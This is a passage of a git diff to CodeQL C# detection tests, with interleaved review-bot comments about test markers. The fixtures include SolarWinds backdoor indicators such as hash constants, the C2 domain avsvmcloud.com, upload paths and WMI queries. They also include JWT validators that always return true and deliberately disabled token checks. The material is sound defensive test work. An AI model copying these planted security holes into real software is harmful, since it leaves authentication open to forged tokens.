682250828679635420, 6827032273910657891, - 6943102301517884811, 700598796416086955, 7080175711202577138, 7175363135479931834, - 7315838824213522000, 7412338704062093516, 7516148236133302073, 7574774749059321801, - 7701683279824397773, 7775177810774851294, 7810436520414958497, 7878537243757499832, - 79089792725215063, 7982848972385914508, 8052533790968282297, 8129411991672431889, - 8146185202538899243, 835151375515278827, 8381292265993977266, 8408095252303317471, - 8473756179280619170, 8478833628889826985, 8612208440357175863, 8697424601205169055, - 8698326794961817906, 8709004393777297355, 8727477769544302060, 8760312338504300643, - 8799118153397725683, 8873858923435176895, 8994091295115840290, 9007106680104765185, - 9061219083560670602, 9149947745824492274, 917638920165491138, 9234894663364701749, - 9333057603143916814, 9384605490088500348, 9531326785919727076, 9555688264681862794, - 9559632696372799208, 9903758755917170407 + 10063651499895178962, 10235971842993272939, 10296494671777307979, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10336842116636872171, 10374841591685794123, 10393903804869831898, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10463926208560207521, 10484659978517092504, 10501212300031893463, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10545868833523019926, 10657751674541025650, 106672141413120087, 10734127004244879770, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 10829648878147112121, 1099511628211, 11073283311104541690, 1109067043404435916, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 11109294216876344399, 11266044540366291518, 11385275378891906608, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 11771945869106552231, 11801746708619571308, 11818825521849580123, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 11913842725949116895, 12027963942392743532, 12094027092655598256, // $ 
Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12343334044036541897, 12445177985737237804, 12445232961318634374, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12574535824074203265, 12679195163651834776, 12709986806548166638, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12718416789200275332, 12785322942775634499, 12790084614253405985, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 12969190449276002545, 13014156621614176974, 13029357933491444455, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13135068273077306806, 13260224381505715848, 13316211011159594063, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13464308873961738403, 13544031715334011032, 13581776705111912829, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13599785766252827703, 13611051401579634621, 13611814135072561278, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13655261125244647696, 1367627386496056834, 1368907909245890092, 13693525876560827283, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13783346438774742614, 13799353263187722717, 13825071784440082496, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 13852439084267373191, 13876356431472225791, 14055243717250701608, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14079676299181301772, 14095938998438966337, 14111374107076822891, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14193859431895170587, 14226582801651130532, 14243671177281069512, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14256853800858727521, 14480775929210717493, 14482658293117931546, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14513577387099045298, 14630721578341374856, 14695981039346656037, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14710585101020280896, 1475579823244607677, 
14868920869169964081, 14968320160131875803, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 14971809093655817917, 15039834196857999838, 15092207615430402812, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 15114163911481793350, 15194901817027173566, 15267980678929160412, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 15457732070353984570, 15514036435533858158, 15535773470978271326, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 15587050164583443069, 155978580751494388, 15695338751700748390, 15997665423159927228, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16066522799090129502, 16066651430762394116, 16112751343173365533, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16130138450758310172, 1614465773938842903, 16292685861617888592, 16335643316870329598, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16423314183614230717, 16570804352575357627, 1682585410644922036, 16858955978146406642, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 16990567851129491937, 17017923349298346219, 17097380490166623672, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17109238199226571972, 17204844226884380288, 17291806236368054941, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17351543633914244545, 17439059603042731363, 17574002783607647274, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17624147599670377042, 17633734304611248415, 17683972236092287897, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17849680105131524334, 17939405613729073960, 17956969551821596225, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 17978774977754553159, 17984632978012874803, 17997967489723066537, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 18147627057830191163, 18150909006539876521, 18159703063075866524, // $ 
Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 18246404330670877335, 18294908219222222902, 18392881921099771407, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 18446744073709551613, 191060519014405309, 2032008861530788751, 2128122064571842954, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2147483647, 2147745794, 2380224015317016190, 2478231962306073784, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2532538262737333146, 2589926981877829912, 2597124982561782591, 2600364143812063535, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2717025511528702475, 2734787258623754862, 27407921587843457, 2760663353550280147, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 2797129108883749491, 2810460305047003196, 292198192373389586, 2934149816356927366, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3045986759481489935, 3178468437029279937, 3200333496547938354, 3320026265773918739, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3320767229281015341, 3341747963119755850, 3407972863931386250, 3413052607651207697, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3413886037471417852, 3421197789791424393, 3421213182954201407, 3425260965299690882, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3538022140597504361, 3575761800716667678, 3588624367609827560, 3626142665768487764, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3642525650883269872, 3656637464651387014, 3660705254426876796, 3769837838875367802, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3778500091710709090, 3796405623695665524, 3869935012404164040, 3890769468012566366, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 3890794756780010537, 397780960855462669, 4030236413975199654, 4088976323439621041, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 
4454255944391929578, 4501656691368064027, 4578480846255629462, 4821863173800309721, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 4931721628717906635, 506634811745884560, 5132256620104998637, 5183687599225757871, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 521157249538507889, 5219431737322569038, 541172992193764396, 5415426428750045503, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 5449730069165757263, 5587557070429522647, 5614586596107908838, 576626207276463000, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 5942282052525294911, 5945487981219695001, 5984963105389676759, 607197993339007484, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6088115528707848728, 6116246686670134098, 6180361713414290679, 6195833633417633900, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6274014997237900919, 640589622539783622, 6461429591783621719, 6491986958834001955, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6508141243778577344, 6605813339339102567, 682250828679635420, 6827032273910657891, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 6943102301517884811, 700598796416086955, 7080175711202577138, 7175363135479931834, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 7315838824213522000, 7412338704062093516, 7516148236133302073, 7574774749059321801, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 7701683279824397773, 7775177810774851294, 7810436520414958497, 7878537243757499832, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 79089792725215063, 7982848972385914508, 8052533790968282297, 8129411991672431889, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8146185202538899243, 835151375515278827, 8381292265993977266, 8408095252303317471, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8473756179280619170, 8478833628889826985, 
8612208440357175863, 8697424601205169055, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8698326794961817906, 8709004393777297355, 8727477769544302060, 8760312338504300643, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 8799118153397725683, 8873858923435176895, 8994091295115840290, 9007106680104765185, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 9061219083560670602, 9149947745824492274, 917638920165491138, 9234894663364701749, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 9333057603143916814, 9384605490088500348, 9531326785919727076, 9555688264681862794, // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] + 9559632696372799208, 9903758755917170407 // $ Alert[cs/solorigate/number-of-known-hashes-above-threshold] }; } void Literals() { string[] literals = { // BUG : NumberOfKnownLiteralsAboveThreshold - "(?i)([^a-z]|^)(test)([^a-z]|$)", "(?i)(solarwinds)", "[{0,5}] {1,-16} {2}\t{3,5} {4}\\{5}\n", - "[{0,5}] {1}\n", "[E] {0} {1} {2}", - "\"\\{[0-9a-f-]{36}\\}\"|\"[0-9a-f]{32}\"|\"[0-9a-f]{16}\"", ".CortexPlugin", ".Orion", - "\"EventName\":\"EventManager\",", "\"EventType\":\"Orion\",", - "\\OrionImprovement\\SolarWinds.OrionImprovement.exe", - "0123456789abcdefghijklmnopqrstuvwxyz-_.", "\"sessionId\":\"{0}\",", "\"steps\":[", - "\"Succeeded\":true,", "\"Timestamp\":\"\\/Date({0})\\/\",", "\"userId\":\"{0}\",", - "{0} {1} HTTP/{2}\n", "10140", "144.86.226.0", "154.118.140.0", "172.16.0.0", "18.130.0.0", - "184.72.0.0", "192.168.0.0", "199.201.117.0", "20.140.0.0", "20100", "20220", "217.163.7.0", - "224.0.0.0", "240.0.0.0", "255.240.0.0", "255.254.0.0", "255.255.248.0", "3.0.0.382", - "41.84.159.0", "43140", "4320", "43260", "524287", "583da945-62af-10e8-4902-a8f205c72b2e", - "65280", "71.152.53.0", "74.114.24.0", "8.18.144.0", "87.238.80.0", "96.31.172.0", "983040", - "99.79.0.0", "Administrator", "advapi32.dll", "Apollo", "appsync-api", "avsvmcloud.com", - 
"api.solarwinds.com", "-root", "-cert", "-universal_ca", "-ca", "-primary_ca", "-timestamp", - "-global", "-secureca", "CloudMonitoring", "MACAddress", "DHCPEnabled", "DHCPServer", - "DNSHostName", "DNSDomainSuffixSearchOrder", "DNSServerSearchOrder", "IPAddress", "IPSubnet", - "DefaultIPGateway", "OSArchitecture", "InstallDate", "Organization", "RegisteredUser", - "fc00::", "fe00::", "fec0::", "ffc0::", "ff00::", "HKCC", "HKCR", "HKCU", "HKDD", - "HKEY_CLASSES_ROOT", "HKEY_CURRENT_CONFIG", "HKEY_CURRENT_USER", "HKEY_DYN_DATA", - "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", - "HKEY_PERFOMANCE_DATA", "HKEY_USERS", "HKLM", "HKPD", "HKU", "If-None-Match", - "Microsoft-CryptoAPI/", "Nodes", "Volumes", "Interfaces", "Components", "opensans", - "Organization", "OSArchitecture", "ParentProcessID", "PathName", "ReportWatcherPostpone", - "ReportWatcherRetry", "S-1-5-", "SeRestorePrivilege", "SeShutdownPrivilege", - "SeTakeOwnershipPrivilege", "SolarWinds", "SolarWindsOrionImprovementClient/", - "SourceCodePro", "SourceHanSans", "SourceHanSerif", "SourceSerifPro", "Start", "swip/Events", - "swip/upd/", "swip/Upload.ashx", "SYSTEM", "SYSTEM\\CurrentControlSet\\services", "us-east-1", - "us-east-2", "us-west-2", "fonts/woff/{0}-{1}-{2}{3}.woff2", - "fonts/woff/{0}-{1}-{2}-webfont{3}.woff2", "ph2eifo3n5utg1j8d94qrvbmk0sal76c", - "pki/crl/{0}{1}{2}.crl", "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj", - "Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true", - "Select * From Win32_OperatingSystem", "Select * From Win32_Process", - "Select * From Win32_SystemDriver", "Select * From Win32_UserAccount" + "(?i)([^a-z]|^)(test)([^a-z]|$)", "(?i)(solarwinds)", "[{0,5}] {1,-16} {2}\t{3,5} {4}\\{5}\n", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "[{0,5}] {1}\n", "[E] {0} {1} {2}", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\"\\{[0-9a-f-]{36}\\}\"|\"[0-9a-f]{32}\"|\"[0-9a-f]{16}\"", 
".CortexPlugin", ".Orion", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\"EventName\":\"EventManager\",", "\"EventType\":\"Orion\",", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\\OrionImprovement\\SolarWinds.OrionImprovement.exe", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "0123456789abcdefghijklmnopqrstuvwxyz-_.", "\"sessionId\":\"{0}\",", "\"steps\":[", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "\"Succeeded\":true,", "\"Timestamp\":\"\\/Date({0})\\/\",", "\"userId\":\"{0}\",", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "{0} {1} HTTP/{2}\n", "10140", "144.86.226.0", "154.118.140.0", "172.16.0.0", "18.130.0.0", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "184.72.0.0", "192.168.0.0", "199.201.117.0", "20.140.0.0", "20100", "20220", "217.163.7.0", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "224.0.0.0", "240.0.0.0", "255.240.0.0", "255.254.0.0", "255.255.248.0", "3.0.0.382", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "41.84.159.0", "43140", "4320", "43260", "524287", "583da945-62af-10e8-4902-a8f205c72b2e", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "65280", "71.152.53.0", "74.114.24.0", "8.18.144.0", "87.238.80.0", "96.31.172.0", "983040", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "99.79.0.0", "Administrator", "advapi32.dll", "Apollo", "appsync-api", "avsvmcloud.com", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "api.solarwinds.com", "-root", "-cert", "-universal_ca", "-ca", "-primary_ca", "-timestamp", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "-global", "-secureca", "CloudMonitoring", "MACAddress", "DHCPEnabled", "DHCPServer", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "DNSHostName", "DNSDomainSuffixSearchOrder", 
"DNSServerSearchOrder", "IPAddress", "IPSubnet", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "DefaultIPGateway", "OSArchitecture", "InstallDate", "Organization", "RegisteredUser", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "fc00::", "fe00::", "fec0::", "ffc0::", "ff00::", "HKCC", "HKCR", "HKCU", "HKDD", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "HKEY_CLASSES_ROOT", "HKEY_CURRENT_CONFIG", "HKEY_CURRENT_USER", "HKEY_DYN_DATA", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "HKEY_PERFOMANCE_DATA", "HKEY_USERS", "HKLM", "HKPD", "HKU", "If-None-Match", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Microsoft-CryptoAPI/", "Nodes", "Volumes", "Interfaces", "Components", "opensans", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Organization", "OSArchitecture", "ParentProcessID", "PathName", "ReportWatcherPostpone", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "ReportWatcherRetry", "S-1-5-", "SeRestorePrivilege", "SeShutdownPrivilege", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "SeTakeOwnershipPrivilege", "SolarWinds", "SolarWindsOrionImprovementClient/", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "SourceCodePro", "SourceHanSans", "SourceHanSerif", "SourceSerifPro", "Start", "swip/Events", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "swip/upd/", "swip/Upload.ashx", "SYSTEM", "SYSTEM\\CurrentControlSet\\services", "us-east-1", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "us-east-2", "us-west-2", "fonts/woff/{0}-{1}-{2}{3}.woff2", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "fonts/woff/{0}-{1}-{2}-webfont{3}.woff2", 
"ph2eifo3n5utg1j8d94qrvbmk0sal76c", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "pki/crl/{0}{1}{2}.crl", "rq3gsalt6u1iyfzop572d49bnx8cvmkewhj", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Select * From Win32_OperatingSystem", "Select * From Win32_Process", // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] + "Select * From Win32_SystemDriver", "Select * From Win32_UserAccount" // $ Alert[cs/solorigate/number-of-known-literals-above-threshold] }; } @@ -286,7 +286,7 @@ void SwallowExceptionTest() Literals(); } catch // BUG : SwallowEverythingExceptionHandler - {} + {} // $ Alert[cs/solorigate/swallow-everything-exception] try{ Literals(); @@ -294,7 +294,7 @@ void SwallowExceptionTest() catch( Exception e) // BUG : SwallowEverythingExceptionHandler { // - } + } // $ Alert[cs/solorigate/swallow-everything-exception] try{ Literals(); diff --git a/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref b/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref index 6ff2dbd1d5f5..5d28fb2ecf9a 100644 --- a/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref +++ b/csharp/ql/integration-tests/all-platforms/standalone/DatabaseQualityDiagnostics.qlref @@ -1 +1 @@ -Telemetry/DatabaseQualityDiagnostics.ql \ No newline at end of file +query: Telemetry/DatabaseQualityDiagnostics.ql diff --git a/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref b/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref index 6ff2dbd1d5f5..5d28fb2ecf9a 100644 --- a/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref 
+++ b/csharp/ql/integration-tests/all-platforms/standalone_buildless_option/DatabaseQualityDiagnostics.qlref @@ -1 +1 @@ -Telemetry/DatabaseQualityDiagnostics.ql \ No newline at end of file +query: Telemetry/DatabaseQualityDiagnostics.ql diff --git a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected index d0e8e0281f84..54c478d94373 100644 --- a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected +++ b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected @@ -3,6 +3,6 @@ edges nodes | RequestForgery.cs:12:52:12:54 | url : String | semmle.label | url : String | | RequestForgery.cs:14:66:14:68 | access to parameter url | semmle.label | access to parameter url | -subpaths problems | RequestForgery.cs:14:66:14:68 | access to parameter url | RequestForgery.cs:12:52:12:54 | url : String | RequestForgery.cs:14:66:14:68 | access to parameter url | The URL of this request depends on a $@. | RequestForgery.cs:12:52:12:54 | url | user-provided value | +subpaths diff --git a/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref b/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref index 3d529ae5a2ca..d4f3819dbac4 100644 --- a/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref +++ b/csharp/ql/test/experimental/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -experimental/CWE-918/RequestForgery.ql \ No newline at end of file +query: experimental/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref index 527ea9259733..2c6cebb2dfc9 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref 
+++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.qlref
@@ -1 +1,2 @@
-experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql
\ No newline at end of file
+query: experimental/Security Features/JsonWebTokenHandler/delegated-security-validations-always-return-true.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs
index 01af41c4b0c0..03a903a4f4be 100644
--- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs
+++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/delegation-test.cs
@@ -98,8 +98,8 @@ public void TestCase01() SaveSigninToken = true }; - tokenValidationParamsBaseline.LifetimeValidator = (notBefore, expires, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); // BUG delegated-security-validations-always-return-true - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => true; // BUG delegated-security-validations-always-return-true + tokenValidationParamsBaseline.LifetimeValidator = (notBefore, expires, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); // BUG delegated-security-validations-always-return-true // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => true; // BUG delegated-security-validations-always-return-true // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] tokenValidationParamsBaseline.TokenReplayValidator = (DateTime? expirationTime, string securityToken, TokenValidationParameters validationParameters) => // GOOD { if (securityToken is null) 
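Review bot: The two flagged validator assignments in this hunk now carry two markers each, the legacy free-text `// BUG delegated-security-validations-always-return-true` and the new `// $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true]`. Going by the `postprocess:` line added to the `.qlref`, only the second appears to be checked, so the first can drift out of date unnoticed. I would keep a single marker, e.g. `... => true; // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true]`. The same doubling appears in the next hunk of this file (`// BUG` / `//BUG`), in security-validation-disabled-test.cs (`// BUG // $ Alert[...]`) and in Serialization/test0.cs (`// bug:<Query>.ql // $ Alert[...]`). The body of `TestCase01` starts and ends outside this hunk.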
@@ -112,11 +112,11 @@ public void TestCase01() tokenValidationParamsBaseline.LifetimeValidator = (notBefore, expires, securityToken, validationParameters) => ValidateLifetime02(securityToken, validationParameters); // GOOD tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => {return securityToken is null?false:true; }; // GOOD - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return true; }; // BUG - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => !false ; // BUG - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return securityToken is null?true:true; }; // BUG - tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return ValidateLifetimeAlwaysTrue(securityToken, validationParameters);}; //BUG - tokenValidationParamsBaseline.AudienceValidator = (audiences, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); //BUG + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return true; }; // BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => !false ; // BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable 
audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return securityToken is null?true:true; }; // BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (IEnumerable audiences, SecurityToken securityToken, TokenValidationParameters validationParameters) => { return ValidateLifetimeAlwaysTrue(securityToken, validationParameters);}; //BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] + tokenValidationParamsBaseline.AudienceValidator = (audiences, securityToken, validationParameters) => ValidateLifetimeAlwaysTrue(securityToken, validationParameters); //BUG // $ Alert[cs/json-webtoken-handler/delegated-security-validations-always-return-true] } diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs index 505aba41416f..57c5d51527f1 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs +++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled-test.cs 
@@ -28,13 +28,13 @@ public void TestCase01() ClockSkew = TimeSpan.FromMinutes(5), ValidateActor = false, ValidateIssuerSigningKey = false, - ValidateIssuer = false, // BUG - ValidateAudience = false, // BUG - ValidateLifetime = false, // BUG - RequireExpirationTime = false, // BUG + ValidateIssuer = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] + ValidateAudience = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] + ValidateLifetime = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] + RequireExpirationTime = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] ValidateTokenReplay = false, RequireSignedTokens = false, - RequireAudience = false, // BUG + RequireAudience = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] SaveSigninToken = false }; } diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref index ee07957fa06c..6e09f8b533ba 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref +++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref @@ -1 +1,2 @@ -experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql \ No newline at end of file +query: experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref b/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref index 7283db95daf5..2000d5d88765 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref 
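Review bot: `ValidateIssuerSigningKey = false` and `RequireSignedTokens = false` (likewise `ValidateActor` and `ValidateTokenReplay`) are left without an expectation in this initializer. Once security-validation-disabled.qlref runs `utils/test/InlineExpectationsTestQuery.ql`, the file therefore asserts that `cs/json-webtoken-handler/security-validations-disabled` stays silent when signature checks are switched off. If that is the query's intended scope, I would say so on those lines, e.g. `RequireSignedTokens = false, // not flagged: outside this query's scope`, so the missing `// BUG` is not read as an oversight. The query itself is not part of this patch, so I cannot tell which it is. The initializer begins above the hunk.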
+++ b/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref
@@ -1 +1,2 @@
-experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql
\ No newline at end of file
+query: experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref b/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref
index 8a8632c6ee3b..767133e00a8e 100644
--- a/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref
+++ b/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref
@@ -1 +1,2 @@
-experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql
\ No newline at end of file
+query: experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
